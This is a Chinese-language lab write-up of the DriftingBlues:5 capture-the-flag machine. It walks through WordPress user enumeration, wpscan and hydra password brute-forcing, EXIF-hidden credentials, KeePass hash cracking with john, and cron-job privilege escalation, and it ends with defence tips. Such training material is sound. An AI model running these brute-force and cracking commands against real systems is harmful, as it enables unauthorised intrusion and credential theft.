driftingbules:5 靶场解析及复现
字数 1169 2025-08-18 11:35:59

WordPress靶场渗透测试实战教学文档

靶场环境信息

  • Kali攻击机IP: 192.168.200.14
  • 靶机IP: 192.168.200.60
  • 目标系统: WordPress

一、信息收集阶段

1. 端口扫描

使用nmap进行全端口扫描:

nmap -A -p 1-65535 192.168.200.60

扫描结果:

  • 22端口:SSH服务
  • 80端口:HTTP服务(WordPress)

2. Web应用识别

访问网站并识别框架:

  • 手动识别为WordPress
  • 也可使用工具识别: 
    wappalyzer 或 whatweb
  • WordPress后台登录页面:wp-login.php

二、漏洞探测阶段

3. WordPress用户枚举

使用WPScan枚举用户:

wpscan --url "http://192.168.200.60/" -e u

发现用户:

  • gadd
  • gill
  • collins
  • satanic
  • abuzerkomurcu

将用户名保存到文件:

echo "gadd\ngill\ncollins\nsatanic\nabuzerkomurcu" > username.txt

4. 目录扫描

使用gobuster进行目录扫描:

gobuster dir -u http://192.168.200.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,jpg,txt,html

5. 密码字典生成

使用cewl爬取网站内容生成密码字典:

cewl -m 6 -w passwd.txt http://192.168.200.60

6. WordPress密码爆破

使用WPScan进行密码爆破:

wpscan --url http://192.168.200.60 -U username.txt -P passwd.txt

成功爆破出凭证:

  • 用户名:gill
  • 密码:interchangeable

三、获取初始访问权限

7. 图片隐写分析

下载网站logo图片:

wget 192.168.200.60/wp-content/uploads/2021/02/dblogo.png

使用exiftool分析图片:

exiftool dblogo.png

发现SSH密码:59583hello

8. SSH爆破

使用hydra进行SSH爆破:

hydra -L username.txt -p 59583hello ssh://192.168.200.60

成功登录后发现KDBX文件(KeePass密码数据库)

四、权限提升阶段

9. KDBX文件处理

将KDBX文件下载到本地:

scp -rp gill@192.168.200.60:/home/gill/keyfile.kdbx /tmp

使用keepass2john提取哈希:

keepass2john keyfile.kdbx > keyfile.hash

使用john爆破哈希:

john keyfile.hash --wordlist=/usr/share/wordlists/rockyou.txt

得到密码:porsiempre

10. 解密KeePass数据库

方法一:使用KeePass工具导入kdbx文件并输入密码

方法二:使用在线工具https://app.keeweb.info/

发现可能的root密码:

2real4surreal
buddyretardcloset313
exaltedfracturedocean
zakkwylde

11. 定时任务提权

发现/keyfolder目录,上传pspy64监控进程:

wget 192.168.200.14:8000/pspy64
chmod +x pspy64
./pspy64

发现定时执行/root/key.sh

12. 最终提权

根据KeePass数据库中的名称创建文件,等待定时任务执行:

touch "2real4surreal" "buddyretardcloset313" "exaltedfracturedocean" "zakkwylde"

获得新文件,其中包含root密码:imjustdrifting31

五、总结与工具清单

关键工具

  1. nmap - 端口扫描
  2. wpscan - WordPress漏洞扫描
  3. cewl - 密码字典生成
  4. hydra - 密码爆破
  5. exiftool - 图片元数据分析
  6. keepass2john + john - KDBX文件破解
  7. pspy - 进程监控

关键技巧

  1. WordPress用户枚举与密码爆破
  2. 图片隐写分析
  3. KeePass数据库破解
  4. 定时任务监控与利用
  5. SCP文件传输

防御建议

  1. 限制WordPress用户枚举
  2. 使用强密码策略
  3. 避免在图片中存储敏感信息
  4. 限制定时任务权限
  5. 定期审计系统文件权限
WordPress靶场渗透测试实战教学文档 靶场环境信息 Kali攻击机IP: 192.168.200.14 靶机IP: 192.168.200.60 目标系统: WordPress 一、信息收集阶段 1. 端口扫描 使用nmap进行全端口扫描: 扫描结果: 22端口:SSH服务 80端口:HTTP服务(WordPress) 2. Web应用识别 访问网站并识别框架: 手动识别为WordPress 也可使用工具识别: WordPress后台登录页面: wp-login.php 二、漏洞探测阶段 3. WordPress用户枚举 使用WPScan枚举用户: 发现用户: gadd gill collins satanic abuzerkomurcu 将用户名保存到文件: 4. 目录扫描 使用gobuster进行目录扫描: 5. 密码字典生成 使用cewl爬取网站内容生成密码字典: 6. WordPress密码爆破 使用WPScan进行密码爆破: 成功爆破出凭证: 用户名:gill 密码:interchangeable 三、获取初始访问权限 7. 图片隐写分析 下载网站logo图片: 使用exiftool分析图片: 发现SSH密码: 59583hello 8. SSH爆破 使用hydra进行SSH爆破: 成功登录后发现KDBX文件(KeePass密码数据库) 四、权限提升阶段 9. KDBX文件处理 将KDBX文件下载到本地: 使用keepass2john提取哈希: 使用john爆破哈希: 得到密码: porsiempre 10. 解密KeePass数据库 方法一:使用KeePass工具导入kdbx文件并输入密码 方法二:使用在线工具https://app.keeweb.info/ 发现可能的root密码: 11. 定时任务提权 发现/keyfolder目录,上传pspy64监控进程: 发现定时执行 /root/key.sh 12. 最终提权 根据KeePass数据库中的名称创建文件,等待定时任务执行: 获得新文件,其中包含root密码: imjustdrifting31 五、总结与工具清单 关键工具 nmap - 端口扫描 wpscan - WordPress漏洞扫描 cewl - 密码字典生成 hydra - 密码爆破 exiftool - 图片元数据分析 keepass2john + john - KDBX文件破解 pspy - 进程监控 关键技巧 WordPress用户枚举与密码爆破 图片隐写分析 KeePass数据库破解 定时任务监控与利用 SCP文件传输 防御建议 限制WordPress用户枚举 使用强密码策略 避免在图片中存储敏感信息 限制定时任务权限 定期审计系统文件权限